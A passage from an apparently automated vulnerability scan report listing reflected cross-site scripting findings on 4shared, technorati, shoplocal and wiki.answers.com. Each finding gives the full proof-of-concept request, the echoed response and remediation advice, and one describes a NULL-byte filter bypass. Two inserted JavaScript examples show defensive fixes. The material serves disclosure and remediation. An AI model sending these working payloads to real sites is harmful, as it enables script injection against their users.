GET /press_room7306f"-alert(1)-"185336a2aa2/press_room.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /press_room7306f&quot;-alert(1)-&quot;185336a2aa2/press_room.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BAB306016A90DE13652BCA754E6DB680.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:19 GMT
Content-Length: 36220


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/press_room7306f"-alert(1)-"185336a2aa2/press_room.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

1.289. http://static.4shared.com/press_room/press_room.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /press_room/press_room.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e703"-alert(1)-"88745b017aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /press_room/press_room.css9e703"-alert(1)-"88745b017aa HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /press_room/press_room.css9e703&quot;-alert(1)-&quot;88745b017aa
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AA804B0B34E735B008C1BC3E9368AF61.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:25 GMT
Content-Length: 36220


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/press_room/press_room.css9e703"-alert(1)-"88745b017aa";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.290. http://static.4shared.com/themes/default.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /themes/default.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f1a9"-alert(1)-"b65b614c6be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /themes7f1a9"-alert(1)-"b65b614c6be/default.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /themes7f1a9&quot;-alert(1)-&quot;b65b614c6be/default.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=480EF7610CAC6BBB0D085FFC3EAB1570.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:22 GMT
Content-Length: 36174


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/themes7f1a9"-alert(1)-"b65b614c6be/default.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.291. http://static.4shared.com/themes/default.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /themes/default.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8a6b"-alert(1)-"5873520bbff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /themes/default.cssd8a6b"-alert(1)-"5873520bbff?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /themes/default.cssd8a6b&quot;-alert(1)-&quot;5873520bbff
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B3A7A8AF385D4FC1A8E0ED110F3EB0BE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:26 GMT
Content-Length: 36185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/themes/default.cssd8a6b"-alert(1)-"5873520bbff";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.292. http://technorati.com/cosmos/search.html [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technorati.com
Path:   /cosmos/search.html

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a773e"><script>alert(1)</script>dab46f51ed7 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cosmos/search.html?url=a773e"><script>alert(1)</script>dab46f51ed7 HTTP/1.1
Host: technorati.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:17:09 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: tvisitor=10.15.116.210.1298688146319064; path=/; expires=Thu, 25-Feb-16 02:42:26 GMT; domain=.technorati.com
Set-Cookie: NEWTRSESSID=93139fd48176819489f0aeb0fc613749; expires=Mon, 30-May-2011 02:17:09 GMT; path=/; domain=technorati.com
Vary: Accept-Encoding
Connection: close
Content-Length: 34801


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head profile="http://gmp
...[SNIP]...
<link rel="alternate" type="application/rss+xml" href="http://www.ingboo.com/pvm/redir?tid=696.10160&return=posts&q=a773e"><script>alert(1)</script>dab46f51ed7&authority=high&client=rss" title="Technorati search results for a773e">
...[SNIP]...

1.293. http://technorati.com/cosmos/search.html [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technorati.com
Path:   /cosmos/search.html

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5eb43'-alert(1)-'f01b11d4625 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cosmos/search.html?url=5eb43'-alert(1)-'f01b11d4625 HTTP/1.1
Host: technorati.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:17:14 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: tvisitor=10.15.116.210.1298688151422022; path=/; expires=Thu, 25-Feb-16 02:42:31 GMT; domain=.technorati.com
Set-Cookie: NEWTRSESSID=0c8fef00216e16fd63153afc19943dff; expires=Mon, 30-May-2011 02:17:14 GMT; path=/; domain=technorati.com
Connection: close
Content-Length: 34541


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head profile="http://gmp
...[SNIP]...
//www.ingboo.com/dhtmlwindowfiles/ing.js");
function popIngboo() {
posX = ($(window).width() - 480 ) / 2;
posY = 200;
ingboosub('tid=696.10160&return=posts&authority=high&q=5eb43'-alert(1)-'f01b11d4625',posX,posY,null,1);
}
</script>
...[SNIP]...

1.294. http://uid.shoplocal.com/uid.aspx [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://uid.shoplocal.com
Path:   /uid.aspx

Issue detail

The value of the callback request parameter is copied unmodified into the response body as plain text: it is the JSONP function name written in front of the JSON object. Because the response is served with Content-Type: text/html rather than a script MIME type, the reflected <script> element is parsed as HTML. The payload 45a5f<script>alert(1)</script>72002c4d70c was submitted in the callback parameter and echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
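The fix for a JSONP endpoint like this one, as an added example that is not code from the scan report or from shoplocal: a callback name is a dotted chain of JavaScript identifiers and nothing else, so it is validated against that grammar and rejected otherwise, and the response is labelled as script with nosniff so a browser does not render it as HTML. The function names, the 64-character limit and the response shape (status, headers, body) are this example's own assumptions; the payload and the UID value are the ones recorded in finding 1.294.

```javascript
// Added example; not code from the scan report or from shoplocal. The endpoint
// echoed the raw callback parameter in front of its JSON body, with
// Content-Type: text/html, so reflected <script> tags rendered as HTML.

// Payload recorded in finding 1.294.
const REPORTED_CALLBACK = 'json_results45a5f<script>alert(1)</script>72002c4d70c';

// A JSONP callback must be a dotted chain of JavaScript identifiers.
const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$/;

// Length cap of 64 is an assumption of this example, not a value from the report.
function isValidCallback(name) {
  return typeof name === 'string' && name.length <= 64 && CALLBACK_RE.test(name);
}

// Build the JSONP response as {status, headers, body}. Invalid callback names are
// answered with 400 rather than echoed; the payload is serialised with
// JSON.stringify so a value can never close the call expression either.
function jsonpResponse(callback, payload) {
  if (!isValidCallback(callback)) {
    return {
      status: 400,
      headers: { 'Content-Type': 'text/plain; charset=utf-8' },
      body: 'invalid callback',
    };
  }
  return {
    status: 200,
    headers: {
      // A script MIME type so the body is not rendered as a page, and nosniff so
      // the browser does not reinterpret it as anything else.
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    body: callback + '(' + JSON.stringify(payload) + ');',
  };
}
```

With the recorded payload the endpoint now answers 400; with a well-formed name the body is the function call wrapped around proper JSON (the original response used single-quoted keys, which is not JSON).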

Request

GET /uid.aspx?callback=json_results45a5f<script>alert(1)</script>72002c4d70c HTTP/1.1
Host: uid.shoplocal.com
Proxy-Connection: keep-alive
Referer: http://www.jcpstoreads.com/jcpenney/Default.aspx?action=entryflash&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SLHUID=UID=11022007583617319321424330414S&Version=1.65

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 109
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
p3p: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
Set-Cookie: SLHUID=UID=11022007583617319321424330414S&Version=1.65; expires=Fri, 26-Feb-2021 04:53:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 04:53:48 GMT

json_results45a5f<script>alert(1)</script>72002c4d70c({'ResultSet':{'UID':'11022007583617319321424330414S'}})

1.295. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984b4"><script>alert(1)</script>3af2ec5fc61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
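The attribute-context reflection seen here and in 1.292 (technorati.com, query value in a <link rel="alternate"> href) and 1.296/1.298/1.300 (canonical <link> href), as an added example that is not code from the scan report or from either site: the vulnerable concatenation of the raw request path into <base href="...">, a two-layer fix (rebuild the path from percent-encoded segments because the value is a URL, then HTML-encode the attribute value), and a structural check. The function names and the decision to reject NUL and other control bytes outright are this example's own assumptions; the paths are the ones recorded in findings 1.295 and 1.296.

```javascript
// Added example; not code from the scan report or from wiki.answers.com. The site
// copied the raw request path into <base href="..."> and <link rel="canonical">.
// Shown: the vulnerable concatenation, a two-layer fix, and a structural check.

// Path recorded in finding 1.295 (REST URL parameter 1).
const REPORTED_PATH = '/Q984b4"><script>alert(1)</script>3af2ec5fc61/FAQ/1873/x26amp';

function renderBaseTagVulnerable(requestPath) {
  return '<base href="http://wiki.answers.com' + requestPath + '" target="_top">';
}

// Layer 1: the value is a URL, so rebuild the path from percent-encoded segments.
// Each segment is decoded, rejected if it contains NUL or another control byte
// (the %00 trick from finding 1.296), and re-encoded so '"', '<' and '>' become %XX.
function normalizePath(requestPath) {
  const out = [];
  for (const seg of requestPath.split('/')) {
    let decoded;
    try {
      decoded = decodeURIComponent(seg);
    } catch (e) {
      return null; // malformed %XX sequence
    }
    if (/[\u0000-\u001f\u007f]/.test(decoded)) return null;
    out.push(encodeURIComponent(decoded));
  }
  return out.join('/');
}

// Layer 2: HTML attribute encoding, applied regardless of layer 1 so the template
// stays safe if the value ever comes from somewhere other than normalizePath().
function htmlAttrEscape(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: null means the request should be answered with 400, not rendered.
function renderBaseTagHardened(requestPath) {
  const path = normalizePath(requestPath);
  if (path === null) return null;
  return '<base href="http://wiki.answers.com' + htmlAttrEscape(path) + '" target="_top">';
}

// Check: return the href value if the tag is a single element whose href
// attribute ends cleanly at its closing quote, otherwise null.
function hrefAttribute(tag) {
  const m = /^<(?:base|link)\b[^<>]*?\bhref="([^"<>]*)"[^<>]*>$/.exec(tag);
  return m ? m[1] : null;
}
```

For the recorded path the hardened tag carries a single, percent-encoded href that decodes back to the original request path, the vulnerable tag fails the structural check, and the %00 path from finding 1.296 is refused before any HTML is produced.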

Request

GET /Q984b4"><script>alert(1)</script>3af2ec5fc61/FAQ/1873/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:06 GMT
X-Varnish: 519896922
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 77504


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<base href="http://wiki.answers.com/Q984b4"><script>alert(1)</script>3af2ec5fc61/FAQ/1873/x26amp" target="_top">
...[SNIP]...

1.296. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001570f"><script>alert(1)</script>7aada9114c7 was submitted in the REST URL parameter 2. The scanner reports the reflection as 1570f"><script>alert(1)</script>7aada9114c7; the canonical <link> in the response below still shows the %00 prefix in its encoded form, but the quote and the script element after it are reflected without encoding, which is what makes the injection work.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /Q/FAQ%001570f"><script>alert(1)</script>7aada9114c7/1873/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:16 GMT
X-Varnish: 519898453
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 41577

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Q/FAQ%001570f"><script>alert(1)</script>7aada9114c7/1873/x26amp" />
...[SNIP]...

1.297. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4116f"%3balert(1)//fe68ef9022c was submitted in the REST URL parameter 3. This input was echoed as 4116f";alert(1)//fe68ef9022c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Q/FAQ/18734116f"%3balert(1)//fe68ef9022c/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:34 GMT
X-Varnish: 519900917
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 52028


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
numAdsFromAdmeld =0;
jQuery(window).load(function (){
       showAdmeldAd("dart_160x600","wikianswers","160x600","atf","_18734116f";alert(1)//fe68ef9022c/x26amp",admeld_site);numAdsFromAdmeld++;    
    if(numAdsFromAdmeld>
...[SNIP]...

1.298. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76672"><script>alert(1)</script>960fa931a3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/FAQ/187376672"><script>alert(1)</script>960fa931a3c/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:33 GMT
X-Varnish: 519900860
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 52187


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Q/FAQ/187376672"><script>alert(1)</script>960fa931a3c/x26amp" />
...[SNIP]...

1.299. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 653cf"%3balert(1)//03b50bd9b91 was submitted in the REST URL parameter 4. This input was echoed as 653cf";alert(1)//03b50bd9b91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Q/FAQ/1873/x26amp653cf"%3balert(1)//03b50bd9b91 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:38 GMT
X-Varnish: 519901994
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 161671


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
numAdsFromAdmeld =0;
jQuery(window).load(function (){
       showAdmeldAd("dart_160x600","ent/music","160x600","atf","_1873/x26amp653cf";alert(1)//03b50bd9b91",admeld_site);numAdsFromAdmeld++;    
    if(numAdsFromAdmeld>
...[SNIP]...

1.300. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcea3"><script>alert(1)</script>db96d2302f0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/FAQ/1873/x26ampfcea3"><script>alert(1)</script>db96d2302f0 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:37 GMT
X-Varnish: 1622868671
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 161813


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Q/FAQ/1873/x26ampfcea3"><script>alert(1)</script>db96d2302f0" />
...[SNIP]...

1.301. http://wiki.answers.com/Q/FAQ/1873/x26amp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17fcb"><script>alert(1)</script>92195d490b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/FAQ/1873/x26amp?17fcb"><script>alert(1)</script>92195d490b4=1 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=hd0boian9748faghsegsfo8ef3; path=/; domain=.answers.com
Set-Cookie: hd0boian9748faghsegsfo8ef3=n%3A0%3A%7B%7D; path=/; domain=.answers.com
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:27:53 GMT
X-Varnish: 519894805
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 161527


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<base href="http://wiki.answers.com/Q/FAQ/1873/x26amp?17fcb"><script>alert(1)</script>92195d490b4=1" target="_top">
...[SNIP]...

1.302. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dfa3"><script>alert(1)</script>e28327de2d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q9dfa3"><script>alert(1)</script>e28327de2d6/FAQ/2637/x26amp HTTP/1.1
